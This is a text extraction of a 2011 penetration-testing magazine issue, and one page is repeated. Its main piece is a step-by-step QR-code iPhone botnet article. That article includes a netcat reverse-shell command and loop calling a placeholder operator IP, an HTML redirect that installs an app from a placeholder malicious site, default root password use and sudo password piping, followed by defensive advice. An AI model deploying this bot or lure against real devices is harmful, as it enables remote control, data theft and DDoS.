Editor's note
Editor's note
Editor's note
Create successful ePaper yourself
Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.
EDITOR’S NOTE<br />
Starter Kit 02/2011 (02)<br />
Mobile Pentesting<br />
The December issue of Pentest Starterkit magazine is devoted primary<br />
to mobile Pentesting. First three articles are developing this subject. First<br />
article written by Nir Waltman is showing how hacker can get to your<br />
iPhone. Explains what is QR code, where is used, types of QR abuse.<br />
Author explain how step by step broke to iPhone by QR. Second article –<br />
by Martyn Ruks touch subject of mobile pentesting. It is focused especially<br />
on Google Android, Apple iOS, Microsoft Phone 7, RIM Blacberry OS. It<br />
Specyfi methods of testing this models. Third article by Prof. Steven Furnell<br />
is discussing about authentication safeguards in mobiles. It presents new<br />
possibilities and solutions different than PIN code, which seem to not<br />
protect privacy of your mobile as majority think.<br />
Second part of this issue is about social fraud. Dinesh Sheety in his article<br />
is showing social engineering from different side. He describes human<br />
being reasons to use hackers tools. Second article on this section by<br />
Garbriel Marcos explain that IT security solutions of company doesn’t<br />
need big knowledge and money but just awareness of some dangerous.<br />
Everybody should know simple and obvious things which help to keep<br />
your computer safe.<br />
Last part of this issue is about solution which you can use to protect your<br />
PC. Bart Hooper in his article is introducing one of risk management<br />
tools – NIST Risk Management Framework. It guide how to build good<br />
protection system step by step. Start from defineing company goals and<br />
finishing on creating proper assessment plan. Last article by Thejendra<br />
introduce basic hacking tools and the most popular goals of attack.<br />
I hope articles contained on this issue will open for you new point on view<br />
you something new.<br />
Enjoy reading!<br />
Olga Głowala<br />
& Pentest team<br />
starterkit 02/2011(2) Page<br />
3<br />
http://pentestmag.com
CONTENTS<br />
Manageing editor: Olga Głowala<br />
olga.glowala@software.com.pl<br />
starterkit 02/2011(2)<br />
TEAM<br />
Betatesters / Proofreaders: Massimo Buso, Ankit Prateek,<br />
Chris Cager, Rishi Narang, Johnatan Ringler, Iftach Ian Amit,<br />
Aby Rao<br />
Senior Consultant/Publisher: Paweł Marciniak<br />
CEO: Ewa Dudzic<br />
ewa.dudzic@software.com.pl<br />
Art Director: Ireneusz Pogroszewski<br />
ireneusz.pogroszewski@software.com.pl<br />
DTP: Ireneusz Pogroszewski<br />
Production Director: Andrzej Kuca<br />
andrzej.kuca@software.com.pl<br />
Marketing Director: Ewa Dudzic<br />
ewa.dudzic@software.com.pl<br />
Publisher: Software Media Sp. z o.o.<br />
ul. Bokserska 1, 02-682 Warszawa<br />
Phone: +48 22 427 36 56<br />
www.pentestmag.com<br />
Whilst every effort has been made to ensure the high quality of<br />
the magazine, the editors make no warranty, express or implied,<br />
concerning the results of content usage.<br />
All trade marks presented in the magazine were used only for<br />
informative purposes.<br />
All rights to trade marks presented in the magazine are<br />
reserved by the companies which own them.<br />
To create graphs and diagrams we used program<br />
by<br />
Mathematical formulas created by Design Science MathType<br />
DISCLAIMER!<br />
The techniques described in our articles may only<br />
be used in private, local networks. The editors<br />
hold no responsibility for misuse of the presented<br />
techniques or consequent data loss.<br />
MOBILE PENTESTING<br />
06<br />
QRbot – iPhone QR botnet<br />
by Nir Valtman<br />
CONTENTS<br />
This article is related to both social engineering and<br />
cyber-crime. Why social engineering? Since QR usage<br />
is based on interactive actions of mobile users, which<br />
might lead to threats on their devices, as will be explained<br />
in detail later.Why cyber-crime? The actions taken<br />
by criminals not only harm the mobile phone/device<br />
users, but also may steal sensitive information or aid<br />
in launching massive actions using controlled, Zombiebased<br />
networks (Botnets), e.g. DDoS – Distributed Denial<br />
of Service attacks.In order to explain the whole process,<br />
this article begins from the basics of QR and iPhone<br />
Usage. After understanding the basics, we will dive into<br />
the actions needed to build a QRbot. Finally, avoidance<br />
recommendations will be explained.<br />
12<br />
Mobile Security Testing<br />
by Martyn Ruks<br />
It is a beginner’s level article, catering to the needs of<br />
professionals who which to switch or try hands on the<br />
Mobile Security Testing. It covers the 3 major platforms<br />
– Android, Windows and iOS. The text starts with a<br />
background information on mobiles, tablets and the need<br />
for their security testing, and finally drills down to „howto”<br />
do the necessary fundamental steps as heads-up.<br />
18<br />
A Mouting a Mobile Masquerade?<br />
by Prof. Steven Furnell<br />
This article examines the forms of protection that are<br />
available to thwart an impostor at the authentication level.<br />
Although mobile devices have offered authentication<br />
safeguards for many years, it is fair to say that many<br />
users have managed to ignore them. The reason here is<br />
often that they overlook the value and sensitivity of what<br />
they’re carrying around in data terms, and so similarly<br />
overlook the need to protect it. While<br />
the situation has improved with<br />
smartphones, there are still<br />
plenty of users whose security<br />
practices haven’t caught up with<br />
their technology usage. Indeed,<br />
if you ask an audience how<br />
many of them don’t use a<br />
PIN (or similar) to protect<br />
their mobile handset, a good<br />
number of hands normally<br />
go up.<br />
Page 4 http://pentestmag.com
SOCIAL FRAUD<br />
24<br />
Social Engineering<br />
by Dinesh Sheety<br />
The idea of this article is simple and nice, though there are<br />
plenty of good resources and books on social engineering<br />
(Mitnick’s Art of Deception!) it’s an „informative” kind<br />
of article, it lacks real examples, for instance a real<br />
example of an attack, for example describe how a pt<br />
on an organization has been done (without disclosing<br />
sensitive Information). Author has provided a good solid<br />
base for someone who doesnt have any clue about social<br />
engineering and by the end of the article they will have a<br />
decent amount of knowledge to go out and build upon.<br />
30<br />
When Computer Attacks<br />
by Gabriel Marcos<br />
There is a new type of cyber threat that is catching<br />
more victims every day; many people know it is called<br />
Advanced Persistent Threats, and there is a trace of high<br />
profile victims out there to give us enough. But before<br />
taking any action we have to bring awareness to what this<br />
new kind of threat means: the only way to be protected<br />
is understanding what this means for the organizations<br />
and how it could impact their business. Undoubtedly<br />
exceptional circumstances call for exceptional actions.<br />
So, maybe it is time to acknowledge that computer<br />
attacks do not always happen to others; we need to<br />
become aware and to be prepared in advance to minimize<br />
risk exposure at this kind of attacks, protecting both our<br />
organizations and their leaders.<br />
SOLUTIONS<br />
36<br />
An Introduction to the NIST Risk<br />
Management Framework<br />
by Bart Hopper<br />
This article will introduce the NIST Risk Management<br />
Framework. It will cover the steps of system<br />
categorization, the selection of security controls, the<br />
implementation of the selected controls, the assessment<br />
of control implementation, and the system authorization<br />
process. Creating an effective information security<br />
program can be a daunting task. If you are lucky, you<br />
work for a company with an existing security program,<br />
clearly defined security mandates, and support from<br />
senior management. But, what do you do if you are<br />
given the task of creating a security program for your<br />
organization? This article will guide you through the<br />
process of creating an effective security program using<br />
the NIST risk management framework. Even if you are not<br />
directly responsible for creating a security program, you<br />
starterkit 02/2011(2)<br />
CONTENTS<br />
may find it helpful to understand how security programs<br />
are created and why certain items are prioritized by<br />
auditors.<br />
40<br />
Why is Cyber Security Important?<br />
by Thejendra<br />
Until a decade ago if you had to rob a bank it was<br />
necessary to indulge in an armed invasion, take hostages,<br />
spill blood, use getaway cars, etc., along with all the<br />
associated risks of botching up the operation. Or you had<br />
to indulge in excellent forgery and duplicate paperwork to<br />
siphon off funds. But today it is not necessary for you to<br />
even visit a bank to loot it without raising any alarms for<br />
weeks. So how is it now easy for criminals to loot a bank?<br />
The simple answer is the Internet. Today, many aspects<br />
of our life like banking, purchases, communications,<br />
etc., and even the militaries depend on the internet and<br />
worldwide connectivity. While the internet offers several<br />
conveniences, it can also ruin your life in an instant<br />
with threats like identity thefts, online scams and other<br />
threats.<br />
Page 5 http://pentestmag.com
QRbot<br />
This article is related to both social engineering<br />
and cyber-crime. Why social engineering?<br />
Since QR usage is based on interactive actions<br />
of mobile users, which might lead to threats on their<br />
devices, as will be explained in detail later.<br />
Why cyber-crime? The actions taken by criminals not<br />
only harm the mobile phone/device users, but also may<br />
steal sensitive information or aid in launching massive<br />
actions using controlled, Zombie-based networks<br />
(Botnets), e.g. DDoS – Distributed Denial of Service<br />
attacks.<br />
In order to explain the whole process, this article<br />
begins from the basics of QR and iPhone Usage.<br />
After understanding the basics, we will dive into the<br />
actions needed to build a QRbot. Finally, avoidance<br />
recommendations will be explained.<br />
What is QR?<br />
A QR (Quick Response) code is a type of matrix<br />
barcode that was developed in order to automate the<br />
industry. The code consists of black modules arranged<br />
in a square pattern on a white background, e.g. the QR<br />
code in Figure 1 is decoded to the phrase Do you think<br />
that information security is expansive? Try to ignore it!<br />
There are similarities to the QR, such as EZcode, QM,<br />
but the QR is the most common.<br />
The QR is used in various places and media types:<br />
newspapers, TV, business cards, books, Google<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
– iPhone QR botnet<br />
Every time that new technology is revealed, lots of security<br />
researchers seek for vulnerabilities in it. In my case, I am looking<br />
for security holes in the integration between QR readers and smart<br />
phones, especially on iPhone.<br />
favorite places i.e. to see review on a restaurant before<br />
entering, Google chrome add-on, museums, house<br />
selling advertisements, on CDs to watch a clip of the<br />
band, troubleshooting on electronic devices, restaurant<br />
menus etc.<br />
In order to read the QR code, the mobile device (not<br />
only smart phones) should include a specialized code<br />
reading and decoding software. The mobile device can<br />
translate it differently to actions, e.g. open URL, send<br />
SMS, make calls, add contacts, show text etc.<br />
However, there are QR codes that cannot be read by<br />
mobile devices because they are encrypted. A matching<br />
decryption key is required to view the content.<br />
QR abuse<br />
The main problem of the QR is that the human eye<br />
cannot decode the message. This makes the following<br />
social attacks possible:<br />
Figure 1. Demo text<br />
Page 6 http://pentestmag.com
QRjacking<br />
A malicious sticker can be pasted over the original<br />
sticker, e.g. on public advertisement in the street or<br />
other public spaces, simply replaced where possible<br />
– websites, brochures etc.<br />
Scanjacking<br />
The scanned barcode would redirect to malicious web<br />
site or run any malicious code. Hence, various attacks<br />
can be executed, e.g. phishing, man-in-the-browser<br />
(form of man-in-the-middle attack), SMS abuse (social<br />
engineering is required) etc.<br />
IPhone users and application permissions<br />
IPhone devices can be divided into two main categories<br />
– legal (factory default configuration) and jailbroken<br />
(running a hacked, modified operating system version).<br />
On one hand, legal iPhone devices can execute only<br />
Apple-approved applications, which may lower the total<br />
risk of getting malicious software on the device. On the<br />
other hand, the jailbroken devices are more vulnerable<br />
to malicious applications since these devices allow<br />
installation of applications which had not been checked<br />
and verified by Apple.<br />
There are several options to install applications on<br />
iPhones: App Store, iTunes, iPhone configuration<br />
utility and over-the-air (from a web server). Of course,<br />
Cidya and Installous are also available on jailbroken<br />
devices.<br />
One thing is certain about both the legal and most of<br />
the jailborken devices – they have a default password<br />
for the root user; by default it’s alpine (without the<br />
quotes, of course).<br />
Why is this interesting? By default, applications<br />
don’t have root access to the iPhones but instead are<br />
provided with a limited access by the user mobile (for<br />
which the default password is dottie). In order to get root<br />
privilege access, we need to do some coding as will be<br />
explained later in this article.<br />
starterkit 02/2011(2)<br />
QR botnet<br />
After understanding QR threats and iPhone limitations, I<br />
can explain the idea behind the title of this article.<br />
In order to build a botnet we need to combine<br />
the threats of the QR code readers with the iPhone<br />
limitations.<br />
The main idea of this attack is to install a malicious<br />
application from a web server directly on the iPhone. It<br />
almost does not matter whether the iPhone is legal or<br />
jailbroken with default root password.<br />
Step 1: Locate vulnerable QR reader<br />
Since we would like to install an application from a web<br />
site, the QR reader should have automatic redirection to<br />
URL. I have been testing the following 10 applications<br />
on my iPhone with iOS 5: QRReader, RedLaser,<br />
QR+, ShopSavvy, Scan, ConnectMe, HP CodeScan,<br />
ATTScanner, ScanLife and i-Nigma. To make it close<br />
to the reality, I searched the word QR in App Store and<br />
downloaded the first 10.<br />
I generated a QR code for a website and scanned<br />
the code in each application. The following applications<br />
have automatic redirection: QRReader, ShopSavvy,<br />
Scan, HP CodeScan, ScanLife and i-Nigma. Summary:<br />
6 of 10 were vulnerable to automatic redirection, e.g. i-<br />
Nigma opens Safari automatically and redirects to the<br />
requested page, see screenshot in Figure 2.<br />
What should appear when automatic redirection is<br />
disabled? See screenshot of RedLaser’s question in<br />
Figure 3.<br />
Figure 2. Automatic redirection in Safari Figure 3. Popup on non-redirecting QR reader<br />
Page 7 http://pentestmag.com
Step 2: Run botnet operator<br />
The concept of this botnet is based on a client-server<br />
application. The server runs Netcat (built-in program on<br />
Linux and Mac), which listens to incoming connections.<br />
The following command should be running on the<br />
server:<br />
nc -k -l 3333<br />
Explanation: Netcat is listening on port 3333 and waiting<br />
for another connection after its current connection is<br />
completed.<br />
Step 3a: Build bot<br />
The development of iPhone applications is performed<br />
on Xcode (I use version 4.2 on Lion), which can be<br />
downloaded and installed for free from Apple’s web site.<br />
In addition, in order to be able to sign the application, a<br />
developer account is needed – it costs some money.<br />
There are ways to bypass signing, but I rather not to<br />
discuss them in this article.<br />
Our bot is based on reverse backdoor shell attack,<br />
which is implemented by using netcat. A reverse<br />
backdoor shell is a scenario when a remote device (i.e.<br />
iPhone) connects to server (i.e. botnet operator) and<br />
then executes local system commands on the device.<br />
In order to execute the attack, the following command<br />
should be run: nc [operator’s_ip] 3333 -e /bin/bash.<br />
However, by default Mac devices don’t support the -e or<br />
-c operators. I was testing various versions of “netcat”<br />
and tried to compile it for different operating systems,<br />
none of them worked in execution mode. Some of you<br />
might think that Mac OS/iOS is only a permutation<br />
of FreeBSD, however the bottom line is that it won’t<br />
work for me. I decided to build my execution mode,<br />
which is based on system calls. See the code below<br />
to understand the concept (not the complete source<br />
code):<br />
system(„echo ‘Started QRbot on iPhone by NirV ‘ > ~/result”);<br />
while (1) {<br />
}<br />
system(„cat ~/result | nc [operator_ip] 3333”);<br />
system(„nc [operator_ip] 3333 | head -n 1 | awk<br />
starterkit 02/2011(2)<br />
‘{system($0)}’ > ~/result”);<br />
Note: not all system calls are supported on legal<br />
devices, therefore the developer of the bot should<br />
consider to implement system commands in Objective<br />
C, e.g. connect to the bot operator by using socket and<br />
listen to commands.<br />
Description: The 1st system call writes a banner to<br />
a file. The banner can include a general message or<br />
MOBILE PENTESTING<br />
include some details about the iPhone, e.g. IP (usually<br />
behind a NAT), system version etc. The next commands<br />
run in endless loop (while true): cat is a command to<br />
print the content of a file; in this case, cat prints the<br />
content of the banner or any content in the ~/result<br />
file. The 2nd system command is combined of printing<br />
the content as explained and passing it as input to the<br />
netcat application, which sends the message to the bot<br />
operator. Since the operator should have control, the<br />
3rd command opens a netcat and stores the output of<br />
the 1st row (the command from the operator), and then<br />
the command is passed as STDIN to the awk command,<br />
which runs the command on the operating system.<br />
Note: even if awk is not installed on the iPhone, the<br />
output can be written to bash file and then executed.<br />
The 2nd command above is now executed to print the<br />
output of the system to the botnet operator.<br />
What are the limitations in the code above? My test is<br />
based generally on iPhone emulator, however the code<br />
might be changed since applications on legal iPhone<br />
run in a sandbox with limited permissions. On physical<br />
iPhone the bot is running under mobile user (not a root),<br />
which means that its current functionality can produce<br />
only DDoS attacks. The good thing about this is that it<br />
does not matter if the iPhone is jailbroken or not.<br />
If we had a root access, what could the QRbot do?<br />
Collect personal data e.g. contact lists, emails, last<br />
visited GPS locations, run as a malware even after<br />
uninstalling the application by adding tasks to the<br />
“crontab” (scheduled tasks), steal cache and generally<br />
backup the iPhone. Is it hard to get root access? The<br />
‘sudo’ command is not implemented by default on iOS,<br />
but the ‘su’ command does. The limitation of ‘su’ is that by<br />
running the command, a different shell is started, which<br />
means that in this case, running the command as script<br />
or as system command is almost impossible. In order<br />
to get root in easier way, the password should remain<br />
alpine and one of the following should be installed on<br />
the iPhone device: OpenSSH or sudo. Important to<br />
mention, most of the jailbroken iPhones have at least<br />
one of them or these can be installed as part of QRbot.<br />
In this case, the attack vector is larger since there are<br />
fewer actions that should be accomplished in order to<br />
get a root access. To make a long story short, if sudo<br />
is installed then the commands above can run with the<br />
following command:<br />
echo ‘[password]’ | sudo -S [command]<br />
If OpenSSH is installed, then reverse ssh tunnel is<br />
probably a good solution – Google it.<br />
In conclusion, the functionality of the QR botnet<br />
depends whether the iPhone is legal or jailbroken, and<br />
Page 8 http://pentestmag.com
Figure 4. Botnet operator screen on application load<br />
if it is jailbroken, the installed applications should be<br />
abused.<br />
Step 3b: Verify bot operation<br />
After coding the logic into the application, some<br />
testing should be done in order to verify that the bot<br />
is operating as we expected. In order to do the tests,<br />
run the server as explained in step 2 and run the<br />
application using Xcode. It is recommended to run<br />
first on iPhone Simulator. The first state of the botnet<br />
operator should not contain any content, however<br />
after running the application, the terminal of the botnet<br />
operator should be as Figure 4, which means that the<br />
iPhone is connected.<br />
Since the iPhone is connected and waiting for<br />
commands, the botnet operator should write an iOS<br />
system call, e.g. ping –c 4 www.google.com, where the –c 4<br />
means that only four requests are sent. A malicious bot<br />
should be running endless loop. The results should be<br />
similar to the screenshot in Figure 5.<br />
The next step is to build an IPA file and test it on<br />
the iPhone. If you have a developer account, then<br />
you should know how to do this. If you don’t have a<br />
developer account, please Google it. Note that some<br />
of the commands that illustrated earlier might not work<br />
on the real iPhone, therefore you need to code the<br />
features, e.g. file system access, socket etc.<br />
Step 4: Publish QRbot on the web<br />
By this step we found a vulnerable QR reader and<br />
created a bot and botnet operator. In order to install the<br />
bot, we need to use a legitimate distribution method. In<br />
Figure 5. Control botnet remotely<br />
starterkit 02/2011(2)<br />
this case, we post the bot on an Internet published IIS<br />
web server, this installation type also known as overthe-air<br />
(OTA) installation. Additional requirements:<br />
static IP address and a DNS name (more reliable), an<br />
XML manifest file (view configuration tasks on Apple’s<br />
web site) and a developer account as single person<br />
or enterprise. The difference between single person to<br />
enterprise is the amount of bots per server, meaning<br />
that the enterprise account supplies unlimited number<br />
of endpoints (iPhone\iPdad). Since the deployment<br />
method is explained in details on iOS Developer Library<br />
(Apple’s web site), the explanation of this step includes<br />
only the important details to make the distribution<br />
work as part of the cyber attack. To accomplish the<br />
attack, create the following HTML page and name it<br />
default.html: Listing 1.<br />
Another option is to run the script in a hidden IFRAME<br />
or on a blog, as there are many blogging platforms<br />
available on the internet, most of which support and<br />
provide easy means to set a blog up and running in a<br />
matter of minutes.<br />
Note that the installation is based on ITMS (aka iTunes<br />
Music Store) protocol. Safari will use the link above in<br />
order to install the application. Important to mention is<br />
that the installation requires user’s approval, which will<br />
be discussed in the next step.<br />
Step 5: QRjacking & Scanjacking<br />
As explained before, social engineering is required in<br />
order to implement the attack. The first action should<br />
be QRjacking, which means that malicious QR should<br />
be replaced with the legal QR. However, it might be<br />
Listing 1. QRjacking<br />
<br />
<br />
<br />
QRbot<br />
<br />
<br />
<br />
//Replace MALSITE.com with<br />
your site<br />
window.location="itmsservices://?action=downloadmanifest&url=http:<br />
//MALSITE.com/manifest.plist";<br />
<br />
<br />
Page 9 http://pentestmag.com
Figure 6. Citadel consulting web site<br />
more comfortable to go further and publish a cool<br />
advertisement on TV. In order to QRjack, generate a<br />
QR code (I use http://qrcode.kaywa.com/) and then<br />
print it, for instance, the QR code in fig6 generates a<br />
link to http://en.citadel.co.il/.<br />
In reality, the link above should be redirected to<br />
the html page from step 4. By entering the page, an<br />
installation screen should appear, as illustrated in<br />
Figure 7.<br />
So the real question is how to trick people to use this<br />
code? The answer is in the question, they already did.<br />
People who scan the QR code are sure that the content<br />
is authentic, or at least do not suspect it as malicious.<br />
Avoidance<br />
As I explained in the beginning of the article, the QRbot<br />
attack is based on both social engineering and cybercrime<br />
techniques. The actions that should be taken in<br />
order to avoid this kind attack are as follows:<br />
Figure 7. Installation conrmation<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
No automatic redirection<br />
There are applications that do not redirect to web pages<br />
automatically. I recommend testing each QR reader that<br />
is downloaded to your iPhone. In order to perform the<br />
test you may use the QR code from this article (which<br />
may be QRjacked) or by generating a QR code to a<br />
URL.<br />
Decode QR<br />
There are many QR decoders; I use http://zxing.org/w/<br />
decode.jspx to validate the data of the code. If you don’t<br />
know the web site to which you are being referred to, it<br />
is recommended to avoid scanning the QR code from<br />
the iPhone.<br />
Control over-the-air (OTA) installation<br />
OTA installation should be used when a specific<br />
organization sends a link for installation. If the purpose<br />
of a QR code is software installation, Apple’s App Store<br />
should do it, unless it is discussed in advance with the<br />
publishing company.<br />
Conclusion<br />
QRbot is a concept of malicious software distribution<br />
and usage as botnet. In this article we have seen<br />
that combining social engineering with cyber-crime<br />
might lead to DDoS attacks and confidential personal<br />
information leakage. The QR botnet is only a PoC,<br />
however it might be used since the implementation of<br />
the attacks above is possible in short time. In order to<br />
avoid the attacks, users should be more aware to the<br />
risks and solutions for using secure QR readers and<br />
verify applications’ installation sources.<br />
NIR VALTMAN<br />
Nir Valtman is employed in Citadel Consulting<br />
LTD (http://en.citadel.co.il) as Chief Security<br />
Architect. Before this position he was<br />
working as senior technology consultant,<br />
Application security consultant, system<br />
security consultant and a technological<br />
trainer. As part of his positions, he was not only consulting,<br />
but also performed hands-on activities in various elds, e.g.<br />
hardening, penetration testing and development for personal\<br />
internal applications. Nir has a BSc in computer science<br />
but his knowledge is based mainly on cowboy learning and<br />
information sharing with the techno-oriented communities.<br />
As part of Nirs’ position, he is responsible to investigate new<br />
technologies, delivery of high-level technologic surveys and<br />
business development in the company. Visit his blog: http://<br />
valtman-nir.blogspot.com or contact him: nirv@citadel.co.il.<br />
Page 10 http://pentestmag.com
Figure 6. Citadel consulting web site<br />
more comfortable to go further and publish a cool<br />
advertisement on TV. In order to QRjack, generate a<br />
QR code (I use http://qrcode.kaywa.com/) and then<br />
print it, for instance, the QR code in fig6 generates a<br />
link to http://en.citadel.co.il/.<br />
In reality, the link above should be redirected to<br />
the html page from step 4. By entering the page, an<br />
installation screen should appear, as illustrated in<br />
Figure 7.<br />
So the real question is how to trick people to use this<br />
code? The answer is in the question, they already did.<br />
People who scan the QR code are sure that the content<br />
is authentic, or at least do not suspect it as malicious.<br />
Avoidance<br />
As I explained in the beginning of the article, the QRbot<br />
attack is based on both social engineering and cybercrime<br />
techniques. The actions that should be taken in<br />
order to avoid this kind attack are as follows:<br />
Figure 7. Installation conrmation<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
No automatic redirection<br />
There are applications that do not redirect to web pages<br />
automatically. I recommend testing each QR reader that<br />
is downloaded to your iPhone. In order to perform the<br />
test you may use the QR code from this article (which<br />
may be QRjacked) or by generating a QR code to a<br />
URL.<br />
Decode QR<br />
There are many QR decoders; I use http://zxing.org/w/<br />
decode.jspx to validate the data of the code. If you don’t<br />
know the web site to which you are being referred to, it<br />
is recommended to avoid scanning the QR code from<br />
the iPhone.<br />
Control over-the-air (OTA) installation<br />
OTA installation should be used when a specific<br />
organization sends a link for installation. If the purpose<br />
of a QR code is software installation, Apple’s App Store<br />
should do it, unless it is discussed in advance with the<br />
publishing company.<br />
Conclusion<br />
QRbot is a concept of malicious software distribution<br />
and usage as botnet. In this article we have seen<br />
that combining social engineering with cyber-crime<br />
might lead to DDoS attacks and confidential personal<br />
information leakage. The QR botnet is only a PoC,<br />
however it might be used since the implementation of<br />
the attacks above is possible in short time. In order to<br />
avoid the attacks, users should be more aware to the<br />
risks and solutions for using secure QR readers and<br />
verify applications’ installation sources.<br />
NIR VALTMAN<br />
Nir Valtman is employed in Citadel Consulting<br />
LTD (http://en.citadel.co.il) as Chief Security<br />
Architect. Before this position he was<br />
working as senior technology consultant,<br />
Application security consultant, system<br />
security consultant and a technological<br />
trainer. As part of his positions, he was not only consulting,<br />
but also performed hands-on activities in various elds, e.g.<br />
hardening, penetration testing and development for personal\<br />
internal applications. Nir has a BSc in computer science<br />
but his knowledge is based mainly on cowboy learning and<br />
information sharing with the techno-oriented communities.<br />
As part of Nirs’ position, he is responsible to investigate new<br />
technologies, delivery of high-level technologic surveys and<br />
business development in the company. Visit his blog: http://<br />
valtman-nir.blogspot.com or contact him: nirv@citadel.co.il.<br />
Page 10 http://pentestmag.com
Mobile Security<br />
Testing<br />
With a new generation of mobile App developers,<br />
who have yet to be trained about secure coding<br />
practices on the new platforms, has come a<br />
wealth of vulnerabilities just waiting to be identified and<br />
exploited. The smartphone revolution hasn’t just caught<br />
businesses off guard it has also exposed security testers<br />
who are often left without the knowledge or toolkits to<br />
be able to provide assurances about the security of the<br />
mobile platforms and applications they are testing. If you<br />
want to know more about how you can become part of<br />
the smartphone security testing revolution then read on!<br />
Introduction<br />
Before we get stuck into discussing how to go about<br />
security testing mobile platforms its worth just looking<br />
at which ones you are likely to encounter if being asked<br />
to perform testing either for a client or for your own<br />
enjoyment. The major platforms are currently:<br />
• Google Android – This recently became the market<br />
leading mobile platform and is very popular with<br />
end users who run it on both phones and tablets.<br />
Android is an open source platform built on Linux<br />
that is used on cheaper lower end devices but can<br />
also be very easy to test for security vulnerabilities.<br />
• Apple iOS – The original smartphone platform that<br />
arguably started this whole revolution and the one time<br />
market leader. iOS is a Unix like platform that is derived<br />
starterkit 02/2011(2)<br />
MOBILE PENTESTING<br />
New technology brings with it new opportunities, for developers<br />
and for security consultants and penetration testers. Usually we<br />
find that new technology brings new opportunities to introduce<br />
vulnerabilities and with the mobile revolution we certainly aren’t<br />
short of them.<br />
from Mac OS X and is designed to run on Apple’s own<br />
phones and tablets and there are several challenges<br />
associated with finding security vulnerabilities.<br />
• Microsoft Phone 7 – The new kid on the block as<br />
far as the major mobile platforms are concerned<br />
and Microsoft’s partnership with Nokia is certain<br />
to help its place in the market. Phone 7 is based<br />
on the Windows CE family although it is a closed<br />
platform with little information available about its<br />
security model.<br />
• RIM Blackberry OS – The current favourite of<br />
the corporate environment is the now ubiquitous<br />
Blackberry. Older devices run a proprietary<br />
Blackberry OS but newer incarnations including<br />
the Playbook tablet now runs on top of a modified<br />
version of the QNX operating system which provides<br />
more opportunity for interrogation of its security.<br />
There are a number of other smartphone platforms<br />
that you may encounter including Nokia’s Symbian<br />
and Palm’s WebOS which are now most likely confined<br />
to the annals of history. In this article we will focus<br />
on three of the platforms mentioned above with the<br />
majority of focus on the two market leaders.<br />
The Need for Testing<br />
Before we get stuck into the mechanics of testing<br />
mobile platforms for security vulnerabilities it is worth<br />
Page 12 http://pentestmag.com
understanding why testing mobile applications and the<br />
platforms they sit on is important. Whereas in the past<br />
our phones were largely a static mass of code that let<br />
us make phone calls and send SMS messages they<br />
are now multifunction devices that run a dynamic set<br />
of applications with a complex ecosystem surrounding<br />
them. Whether you are interested in the security of an<br />
entire handset or tablet or just a single application there<br />
is now an extensive attack surface to consider.<br />
The implication of all this is that whether you are using a<br />
phone within a business or are releasing an App for your<br />
userbase you need to understand the risks that exist. Even<br />
if you are simply releasing an App to the public there are<br />
lots of risks that you need to consider, does the application<br />
expose your user’s information either to another App on<br />
the device or whilst in transit across a network? Does<br />
the application make the user’s entire phone more<br />
vulnerable to attack, thereby putting all their data at risk<br />
of compromise? If you need to find an answer to those<br />
questions you need to understand the security model of<br />
the platform in question and you need to perform some<br />
level of security testing or similar assurance activities.<br />
The Prerequisites for Testing<br />
If you are going to look at any mobile platform, just as with<br />
any other area of security testing or research, you need to<br />
have an environment you can use to for your testing. There<br />
are effectively four things you will need for any platform<br />
although the ability to obtain all of these and the cost<br />
overhead associated with them will vary across platforms:<br />
Phone or tablet hardware<br />
There is nothing like the real deal with hardware to test<br />
out your findings on and to understand how the platform<br />
works in the real world. Whilst on some platforms you<br />
can get away with just using the emulator provided by the<br />
vendor you will find these often have less attack surface<br />
than the real device. Also, If your objective is to go out<br />
and find real world vulnerabilities before anyone else<br />
don’t underestimate the benefit of looking at code written<br />
by the OEMs before they ship their own hardware as this<br />
will be a rich source of bugs just waiting to be found.<br />
Development Environment and Compiler<br />
If you want to find and exploit vulnerabilities on the<br />
platforms it certainly pays to have a development<br />
environment and compiler available to you. One of the<br />
most common methods for exploiting vulnerabilities in<br />
mobile Apps is to write your own malicious App that can<br />
attack from the inside and to do that you w ill need to<br />
either write or modify some code. On some platforms<br />
you will not be able to side load your apps without<br />
a special developer unlocked device or publishing<br />
starterkit 02/2011(2)<br />
through the platform’s application store but on many<br />
you will be able to write and run your own code.<br />
Emulator and Debugger<br />
Even if you have your own shiny hardware to play with<br />
you will find an emulator and debugging tools invaluable in<br />
your efforts to find and exploit security bugs. An emulator<br />
will give you freedom to experiment and debug to your<br />
heart’s content and in many cases will even let you test<br />
shellcode you can port directly to your hardware.<br />
Scripting language or interface<br />
In any form of security testing you will need your<br />
favourite scripting language close at hand. Whether it<br />
s for some adhoc fuzzing, sending some data over the<br />
network or delivering a payload for that remote code<br />
execution vulnerability you just found you can be sure<br />
that a scripting language will be your friend.<br />
Testing Mobile Platforms<br />
Whilst mobile platforms all have their own eccentricities<br />
and differences from those which they evolved from, if<br />
you are going to understand a mobile security model<br />
of the platform you should know about the Operating<br />
System you are interested in. It’s not within the scope<br />
of this article to talk extensively about security testing<br />
against Linux, Windows CE or any of the other platforms<br />
that are the foundation of today’s mobile platforms. If<br />
you are going to be performing a mobile security test<br />
the area you will probably need most support with is in<br />
assessing the applications that run on top of the OS and<br />
most importantly how significant any vulnerabilities you<br />
find actually are. So my message is don’t overlook the<br />
security of the mobile platform itself but there are plenty<br />
of resources out there already and certainly don’t leave<br />
your standard tools behind if looking at this!<br />
One other thing to consider is the way the platform will<br />
be used in the environment it is destined for. You may<br />
be focussing on the OS and the Apps that run on top of it<br />
but there are much wider considerations. For example,<br />
is a corporate policy being enforced, is corporate and<br />
user data segregated, can data be pushed into a cloud<br />
based service and how are backups and other important<br />
admin tasks handled. Make sure you don’t forget about<br />
these when assessing any mobile platform or solution.<br />
With the platform covered off lets now get stuck into<br />
testing the mobile Apps themselves.<br />
Google Android Testing<br />
If you are looking for vulnerabilities in applications on<br />
any of the major mobile platforms it could be argued that<br />
Android is one of the easiest to find them in, if you know<br />
what to look for! The reason why is explained here:<br />
Page 13 http://pentestmag.com
• Android SDK – Testing code on the Android emulator<br />
is very close to running code on the device itself and<br />
is very useful when hunting for bugs or trying out our<br />
exploits. The freely available SDK will provide you<br />
with everything you need to start looking at Android<br />
App security.<br />
• Android Packages – It is very easy to start examining<br />
an application for vulnerabilities, just grab the<br />
package file and off you go; lots of information will<br />
drop straight out at you without much investment of<br />
time or resources.<br />
• Developer Documentation – The current developer<br />
guides for the platform either do not contain or do<br />
not make clear enough the security considerations<br />
for developing on the platform. The result is a wealth<br />
